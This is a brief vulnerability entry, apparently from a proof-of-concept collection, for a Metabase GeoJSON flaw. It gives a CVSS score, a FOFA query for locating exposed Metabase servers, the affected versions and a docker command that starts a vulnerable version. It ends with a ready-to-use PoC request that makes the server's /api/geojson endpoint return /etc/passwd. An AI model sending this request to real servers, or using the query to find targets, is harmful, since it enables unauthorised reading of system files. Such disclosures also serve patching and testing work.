The vulnerability CVSS score: 9.9, damage level: severe
FOFA:
app="metabase"
Affected version:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
Vulnerability demonstration:
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1